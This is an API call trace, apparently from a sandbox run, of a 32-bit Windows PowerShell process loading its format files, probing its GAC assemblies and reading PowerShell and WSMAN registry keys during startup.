	[0162.836] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x3ed1d097, Data2=0xc9a7, Data3=0x41db, Data4=([0]=0xa6, [1]=0x19, [2]=0xcb, [3]=0x6a, [4]=0x2, [5]=0x5b, [6]=0x96, [7]=0x14))) returned 0x0
	[0162.836] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xdeb6440f, Data2=0xceca, Data3=0x42d6, Data4=([0]=0x80, [1]=0xb1, [2]=0x3c, [3]=0x9d, [4]=0x43, [5]=0x7b, [6]=0xca, [7]=0xb2))) returned 0x0
	[0162.836] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.836] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.836] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.836] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0162.836] GetLastError () returned 0x0
	[0162.836] SetErrorMode (uMode=0x1) returned 0x1
	[0162.837] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0162.837] GetLastError () returned 0x0
	[0162.837] GetFileType (hFile=0x34c) returned 0x1
	[0162.837] SetErrorMode (uMode=0x1) returned 0x1
	[0162.837] GetFileType (hFile=0x34c) returned 0x1
	[0162.837] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0162.946] GetLastError () returned 0x0
	[0162.946] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.145] GetLastError () returned 0x0
	[0163.146] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.146] GetLastError () returned 0x0
	[0163.146] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.146] GetLastError () returned 0x0
	[0163.146] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x8b4, lpOverlapped=0x0) returned 1
	[0163.146] GetLastError () returned 0x0
	[0163.146] ReadFile (in: hFile=0x34c, lpBuffer=0x2c4762c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c4762c*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0163.146] GetLastError () returned 0x0
	[0163.146] ReadFile (in: hFile=0x34c, lpBuffer=0x2c481d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c481d8*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0163.146] GetLastError () returned 0x0
	[0163.146] CloseHandle (hObject=0x34c) returned 1
	[0163.567] GetLastError () returned 0x0
	[0163.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.567] GetLastError () returned 0x0
	[0163.567] SetErrorMode (uMode=0x1) returned 0x1
	[0163.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c691d4 | out: lpFileInformation=0x2c691d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0163.567] GetLastError () returned 0x0
	[0163.567] SetErrorMode (uMode=0x1) returned 0x1
	[0163.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.567] GetLastError () returned 0x0
	[0163.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0163.568] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0163.568] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0163.568] RegCloseKey (hKey=0x34c) returned 0x0
	[0163.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.568] GetLastError () returned 0x0
	[0163.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.568] GetLastError () returned 0x0
	[0163.568] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x788e9c7, Data2=0xd1f1, Data3=0x48a3, Data4=([0]=0x99, [1]=0x90, [2]=0x88, [3]=0xe7, [4]=0xb8, [5]=0xa3, [6]=0x72, [7]=0xc3))) returned 0x0
	[0163.568] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xfaad7248, Data2=0xb4f8, Data3=0x4b23, Data4=([0]=0xb0, [1]=0x75, [2]=0x93, [3]=0x2b, [4]=0xbb, [5]=0x95, [6]=0x25, [7]=0x8a))) returned 0x0
	[0163.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.569] GetLastError () returned 0x0
	[0163.569] SetErrorMode (uMode=0x1) returned 0x1
	[0163.569] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0163.569] GetLastError () returned 0x0
	[0163.569] GetFileType (hFile=0x34c) returned 0x1
	[0163.569] SetErrorMode (uMode=0x1) returned 0x1
	[0163.569] GetFileType (hFile=0x34c) returned 0x1
	[0163.569] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.708] GetLastError () returned 0x0
	[0163.708] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.848] GetLastError () returned 0x0
	[0163.848] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.848] GetLastError () returned 0x0
	[0163.848] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0163.848] GetLastError () returned 0x0
	[0163.848] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0xe98, lpOverlapped=0x0) returned 1
	[0163.849] GetLastError () returned 0x0
	[0163.849] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7e71c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7e71c*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0163.849] GetLastError () returned 0x0
	[0163.849] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7f0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c7f0e4*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0163.849] GetLastError () returned 0x0
	[0163.849] CloseHandle (hObject=0x34c) returned 1
	[0163.849] GetLastError () returned 0x0
	[0163.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.849] GetLastError () returned 0x0
	[0163.849] SetErrorMode (uMode=0x1) returned 0x1
	[0163.849] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ca00e0 | out: lpFileInformation=0x2ca00e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0163.850] GetLastError () returned 0x0
	[0163.850] SetErrorMode (uMode=0x1) returned 0x1
	[0163.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.850] GetLastError () returned 0x0
	[0163.850] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0163.850] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0163.850] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0163.850] RegCloseKey (hKey=0x34c) returned 0x0
	[0163.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.850] GetLastError () returned 0x0
	[0163.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.851] GetLastError () returned 0x0
	[0163.851] VirtualQuery (in: lpAddress=0xcd690, lpBuffer=0xce690, dwLength=0x1c | out: lpBuffer=0xce690*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0163.851] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xefaaeefe, Data2=0xb7c, Data3=0x4209, Data4=([0]=0x97, [1]=0x9a, [2]=0x30, [3]=0xc3, [4]=0x82, [5]=0xe9, [6]=0xe3, [7]=0x6c))) returned 0x0
	[0163.851] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x3c0e4f29, Data2=0x1cc1, Data3=0x4434, Data4=([0]=0xb9, [1]=0xcc, [2]=0x8d, [3]=0x1f, [4]=0x9d, [5]=0x11, [6]=0x33, [7]=0xd5))) returned 0x0
	[0164.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0164.102] GetLastError () returned 0x57
	[0164.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0164.102] GetLastError () returned 0x57
	[0164.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.119] GetLastError () returned 0x57
	[0164.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.119] GetLastError () returned 0x57
	[0164.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.122] GetLastError () returned 0x57
	[0164.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.122] GetLastError () returned 0x57
	[0164.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.125] GetLastError () returned 0x57
	[0164.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.126] GetLastError () returned 0x57
	[0164.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.130] GetLastError () returned 0x57
	[0164.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.130] GetLastError () returned 0x57
	[0164.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.132] GetLastError () returned 0x57
	[0164.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.132] GetLastError () returned 0x57
	[0164.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.134] GetLastError () returned 0x57
	[0164.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.134] GetLastError () returned 0x57
	[0164.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.386] GetLastError () returned 0xcb
	[0164.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.390] GetLastError () returned 0xcb
	[0164.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcea2c | out: phkResult=0xcea2c*=0x34c) returned 0x0
	[0164.724] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcea7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea80, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcea7c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea80*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0164.725] RegEnumValueW (in: hKey=0x34c, dwIndex=0x0, lpValueName=0x337c48, lpcchValueName=0xceaa4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xceaa4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.725] RegEnumValueW (in: hKey=0x34c, dwIndex=0x1, lpValueName=0x337c48, lpcchValueName=0xceaa4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xceaa4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0164.725] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcea84, lpData=0x0, lpcbData=0xcea80*=0x0 | out: lpType=0xcea84*=0x1, lpData=0x0, lpcbData=0xcea80*=0x8) returned 0x0
	[0164.725] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcea84, lpData=0x337c48, lpcbData=0xcea80*=0x8 | out: lpType=0xcea84*=0x1, lpData="2.0", lpcbData=0xcea80*=0x8) returned 0x0
	[0165.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9e8 | out: phkResult=0xce9e8*=0x324) returned 0x0
	[0165.449] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcea38, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea3c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcea38*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea3c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0165.449] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x337c48, lpcchValueName=0xcea60, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcea60, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.449] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x337c48, lpcchValueName=0xcea60, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcea60, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0165.449] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcea40, lpData=0x0, lpcbData=0xcea3c*=0x0 | out: lpType=0xcea40*=0x1, lpData=0x0, lpcbData=0xcea3c*=0x8) returned 0x0
	[0165.449] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcea40, lpData=0x337c48, lpcbData=0xcea3c*=0x8 | out: lpType=0xcea40*=0x1, lpData="2.0", lpcbData=0xcea3c*=0x8) returned 0x0
